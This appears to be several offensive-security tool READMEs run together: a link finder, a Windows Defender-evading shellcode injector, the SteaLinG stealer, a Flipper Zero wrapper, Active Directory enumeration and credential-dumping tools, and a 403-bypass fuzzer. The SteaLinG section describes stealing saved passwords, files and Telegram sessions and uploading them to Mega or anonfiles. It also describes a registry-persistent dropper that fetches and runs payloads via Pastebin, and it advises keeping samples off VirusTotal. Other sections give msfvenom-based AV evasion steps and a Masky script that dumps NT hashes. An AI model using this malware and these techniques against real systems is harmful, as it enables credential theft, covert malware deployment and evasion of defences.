python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10
If you have a file of JS file URLs for example, you can look for links in those:
python3 xnLinkFinder.py -i target_js.txt
If you have a files, e.g. JS files, HTTP responses, etc. you can look for links in those:
python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com
NOTE: Sub directories are also checked. The -mfs
option can be specified to skip files over a certain size.
In Burp, select the items you want to search by highlighting the scope for example, right clicking and selecting the Save selected items
. Ensure that the option base64-encode requests and responses
option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_burp.xml
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
starts with <?xml
then you are trying to process a Burp file.
Ideally, provide scope prefix (-sp
) with the primary domain (including schema), and a scope filter (-sf
) to filter the results only to relevant domains.
python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv
In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report
and selecting Export Messages to File...
. This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_zap.txt
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
is in the format ==== 99 ==========
for example, then you are trying to process an OWASP ZAP ASCII text file.
You can pipe xnLinkFinder to other tools. Any errors are sent to stderr
and any links found are sent to stdout
. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:
python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u
You can also pass the input through stdin
instead of -i
.
cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf rebbull.* -d 3
NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i
.
-sp
. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http): http://www.target.com
https://target-payments.com
https://static.target-cdn.com
/path/to/example.js
then giving passing -sp http://www.target.com
will result in teh output http://www.target.com/path/to/example.js
and if Depth (-d
) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains are passed using -sp
then the output will include each domain followed by /path/to/example.js
and increase the chance of finding more links.-sp
but still want the original link of /path/to/example.js
(without a domain) additionally returned in the output, the pass the argument -spo
.-sf
. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d
) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included): target.*
target-payments.com
static.target-cdn.com
-ra
. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.-v
option to have a better idea of what the tool is doing.-vv
option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.-c
), headers (-H
) and regex (-ra
) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
-o
option to give a specific output file name for Links, rather than the default of output.txt
. If you plan on running a large depth of searches, start with 2 with option -v
to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow
.-op
option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt
. Any output will be appended to the existing file, unless you pass -ow
.-d
) be wary of some sites using dynamic links so will it will just keep finding new ones. If no new links are being found, then xnlLinkFinder will stop searching. Providing the Stop flags (s429
, s403
, sTO
, sCE
) should also be considered.-d
value is high), and have limited resources, the program will stop when it reaches the memory Threshold (-m
) value and end gracefully with data intact before getting killed.Ctrl-C
) in the middle of running, be patient and any gathered data will be saved before ending gracefully.-orig
option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but it will suffixed with the origin URL in square brackets.desktop
. If you have a target that could have different links for different user agent groups, the specify -u desktop mobile
for example (separate with a space). The mobile
user agent option is an combination of mobile-apple
, mobile-android
and mobile-windows
.-i
has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs
(default: 500 MB) will be skipped.-replay-proxy
option, sometimes requests can take longer. If you start seeing more Request Timeout
errors (you'll see errors if you use -v
or -vv
options) then consider using -t
to raise the timeout limit.-ascii-only
. This can eliminate a number of false positives that can sometimes get returned from binary data.If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv
to reproduce the problem and let me know about any error messages that are given.
Active link finding for a domain:
...Piped input and output:
Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE!ย โ (I could use the caffeine!)
Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).
Firstly, generate a payload in binary format( using either CobaltStrike
or msfvenom
) for instance, in msfvenom
, you can do it like so( the payload I'm using is for illustration purposes, you can use whatever payload you want ):
msfvenom -p windows/messagebox -f raw -o shellcode.bin
Then convert the shellcode( in binary/raw format ) into a UUID
string format using the Python3 script, bin_to_uuid.py
:
./bin_to_uuid.py -p shellcode.bin > uuid.txt
xor
encrypt the UUID
strings in the uuid.txt
using the Python3 script, xor_encryptor.py
.
./xor_encryptor.py uuid.txt > xor_crypted_out.txt
Copy the C-style
array in the file, xor_crypted_out.txt
, and paste it in the C++ file as an array of unsigned char
i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}
This shellcode injection technique comprises the following subsequent steps:
VirtualAlloc
xor
decrypts the payload using the xor
key valueUuidFromStringA
to convert UUID
strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory
or memcpy
.EnumChildWindows
to execute the payload previously loaded into memory( in step 1 )memcpy
or WriteProcessMemory
which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA
which can be used to decode data as well as write it to memory( Isn't that great folks? And please don't say "NO!" :) ).xor
key(row 86) to what you wish. This can be done in the ./xor_encryptor.py
python3 script by changing the KEY
variable.executable filename
value(row 90) to your filename.mingw
was used but you can use whichever compiler you prefer. :)make
The binary was scanned using antiscan.me on 01/08/2022.
https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it
This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes
module | Short description |
---|---|
Dump password | steal All passwords saved , upload file a passwords saved to mega |
Dump History | dump browser history |
dump files | Steal files from the hard drive with the extension you want |
module | Short description |
---|---|
1-Telegram Session Hijack | Telegram session hijacker |
C:\Users<pc name >\AppData\Roaming\Telegram Desktop
in the 'tedata' folderC:
โโโ Users
โโโ .AppData
โย ย โโโ Roaming
โย ย โโโ TelegramDesktop
โย ย โโโ tdata
Once you have moved this folder with all its contents on your device in the same path, then you do what will happen for it is that simple The tool does all this, all you have to do is give it your token on the site https://anonfiles.com/
The first step is to go to the path where the tdata file is located, and then convert it to a zip file. Of course, if the Telegram was working, this would not happen. If there was any error, it means that the Telegram is open, so I would do the kill processes. antivirus You will see that this is malicious behavior, so I avoided this part at all by the try and except in the code The name of the archive file is used in the name of the device of your victim, because if you have more than one, I mean, after that, you will post request for the zipfile on the anonfiles website using the API key or the token of your account on the site. On it, you will find your token Just that, teacher, and it is not exposed from any AV
module |
---|
2- Dropper |
URL
of the virus or whatever you want to download to the victim's device, but keep in mind that the URL must be direct
, meaning that it must be the end Its Yama .exe or .png,
whatever is important is that it be a link that ends with a backstamp The second thing is to take the API Kay from you, and you will answer it as well. Either you register, click on the word API, you will find it, and you will take the username and password So how does it work?ย
The first thing is to create a paste on the site and make it private Then it adds the url you gave it and then it gives you the exe file, its function is that when it works on any device it starts adding itself to Registry device in two different ways It starts to open pastebin and inserts the special paste you created, takes the paste url, downloads its content and runs And you can enter the url at any time and put another url. It is very normal because the dropper goes every 10 minutes. Checks the URL. If it finds it, it changes it, downloads its content, downloads it, and connects to find it. You don't do anything, and so, every 10 minutes, you can literally do it, you can access your device from anywhere
3- Linux support
4-You can now choose between Mega or Pastebin
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py
* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!
Unoffical Flipper Zero cli wrapper written in Python
$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt
from pyflipper import PyFlipper
#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")
#OR
#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")
#Info
info = flipper.power.info()
#Poweroff
flipper.power.off()
#Reboot
flipper.power.reboot()
#Reboot in DFU mode
flipper.power.reboot2dfu()
#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")
#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")
#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")
#List installed apps
apps = flipper.loader.list()
#Open app
flipper.loader.open(app_name="Clock")
#Get flipper date
date = flipper.date.date()
#Get flipper timestamp
timestamp = flipper.date.timestamp()
#Get the processes dict list
ps = flipper.ps.list()
#Get device info dict
device_info = flipper.device_info.info()
#Get heap info dict
heap = flipper.free.info()
#Get free_blocks string
free_blocks = flipper.free.blocks()
#Get bluetooth info
bt_info = flipper.bt.info()
#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")
#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")
#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")
#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")
#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")
#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")
#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")
#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")
#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")
#Write file in one chunk
file = "/ext/bar.txt"
text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.file(file, text)
#Write file using a listener
file = "/ext/foo.txt"
text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""
flipper.storage.write.start(file)
time.sleep(2)
flipper.storage.write.send(text_one)
text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)
time.sleep(3)
#Don't forget to stop
flipper.storage.write.stop()
#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)
#Set blue led off
flipper.led.blue(value=0)
#Set green led value
flipper.led.green(value=175)
#Set backlight on
flipper.led.backlight_on()
#Set backlight off
flipper.led.backlight_off()
#Turn off led
flipper.led.off()
#Set vibro True or False
flipper.vibro.set(True)
#Set vibro on
flipper.vibro.on()
#Set vibro off
flipper.vibro.off()
#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)
#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)
#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"
#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)
#Stop loop
flipper.music_player.stop()
#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)
#Beep
flipper.music_player.beep()
#Beep for 5 seconds
flipper.music_player.beep(duration=5)
#Synchronous default timeout 5 seconds
#Detect NFC
nfc_detected = flipper.nfc.detect()
#Emulate NFC
flipper.nfc.emulate()
#Activate field
flipper.nfc.field()
#Synchronous default timeout 5 seconds
#Read RFID
rfid = flipper.rfid.read()
#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)
#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")
#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")
#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])
#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)
#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()
#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")
#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")
#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()
#Activate debug mode
flipper.debug.on()
#Deactivate debug mode
flipper.debug.off()
#Search
response = flipper.onewire.search()
#Get
response = flipper.i2c.get()
#Input dump
dump = flipper.input.dump()
#Send input
flipper.input.send("up", "press")
Feel free to contribute in any way
ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7
ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54
BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat
Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.
I wrote Aced simply because I wanted a more targeted approach to query ACLs. Bloodhound is fantastic, however, it is extremely noisy. Bloodhound collects all the things while Aced collects a single thing providing the operator more control over how and what data is collected. There's a phrase the Navy Seals use: "slow is smooth and smooth is fast" and that's the approach I tried to take with Aced. The case for detection is reduced by only querying for what LDAP wants to tell you and by not performing an action known as "expensive ldap queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional integration with BloodHound, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.
Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm
โโ# python3 aced.py -h
_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0
Parse and log a target principal's DACL.
@garrfoster
usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target
Tool to enumerate a single target's DACL in Active Directory
optional arguments:
-h, --help show this help message and exit
Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS isntead of LDAP
Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.
In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.
And here's how that data looks when transformed by bofhound and ingested into BloodHound.
Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.
This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via kerberos & NT hashes retrieval via PKINIT). A blog post was published to detail the implemented technics and how Masky works.
Masky source code is largely based on the amazing Certify and Certipy tools. I really thanks their authors for the researches regarding offensive exploitation technics against ADCS (see. Acknowledgments section).
Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as following:
pip install masky
The Masky agent executable is already included within the PyPi package.
Moreover, if you need to modify the agent, the C# code can be recompiled via a Visual Studio project located in agent/Masky.sln
. It would requires .NET Framework 4
to be built.
Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.
For both usages, you need first to retrieve the FQDN of a CA server
and its CA name
deployed via an ADCS. This information can be easily retrieved via the certipy find
option or via the Microsoft built-in certutil.exe
tool. Make sure that the default User
template is enabled on the targeted CA.
Warning: Masky deploys an executable on each target via a modification of the existing RasAuto
service. Despite the automated roll-back of its intial ImagePath
value, an unexpected error during Masky runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such unwanted stop.
The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows to collect NT hashes, CCACHE and PFX of 3 distincts domain users from the sec.lab testing domain.
Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).
__ __ _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/
usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]
positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not
options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)
Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to au thenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)
Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)
Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)
Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.
from masky import Masky
from getpass import getpass
def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.lab\sec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()
# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)
# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)
# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False
# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"\t - {user.domain}\{user.n ame} - {user.nt_hash}")
return True
if __name__ == "__main__":
dump_nt_hashes()
Its execution generate the following output.
$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a
A MaskyResults
object containing a list of User
objects is returned after a successful execution of Masky.
Please look at the masky\lib\results.py
module to check the methods and attributes provided by these two classes.
Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.
sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install
This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv withpipenv shell
or run commands directly withpipenv run
.
This method is not recommended because python-ldap can cause many dependency errors.
Install dependencies with pip
:
python3 -m pip install -r requirements.txt
python3 silenthound.py -h
$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain
Quietly enumerate an Active Directory environment.
positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP passwo rd - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.
A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.
Using the -o
flag will result in output files for each section normally in stdout. The files created using all flags will be:
-rw-r--r-- 1 kali kali 122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt
For additional feature requests please submit an issue and add the enhancement
tag.
modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.
To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib
. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).
modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.
Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," Since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.
modDetective currently works only with python3; python2 compatability will be completed shortly (hence the lack of f strings). Standard libraries should be fine.
Tool that tests MANY
url bypasses to reach a 40X protected page
.
If you wonder why this code is nothing but a dirty curl wrapper
, here's why:
This is surprisingly hard
to achieve in python without loosing all of the lib goodies like parsing, ssl/tls encapsulation and so on.
So, be like me, use curl as a backend
, it's gonna be just fine.
# Deps
sudo apt install -y bat curl virtualenv python3
# Tool
virtualenv -p python3 .py3
source .py3/bin/activate
pip install -r requirements.txt
./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"
2022-05-10 15:54:03 work bup[738125] INFO === Config ===
2022-05-10 15:54:03 work bup[738125] INFO debug: False
2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list
2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:03 work bup[738125] INFO threads: 20
2022-05-10 15:54:03 work bup[738125] INFO timeout: 2
2022-05-10 15:54:03 work bup[738125] INFO headers: {}
2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls
2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com
2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list
2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64 ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 S afari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: % {size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/ api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'
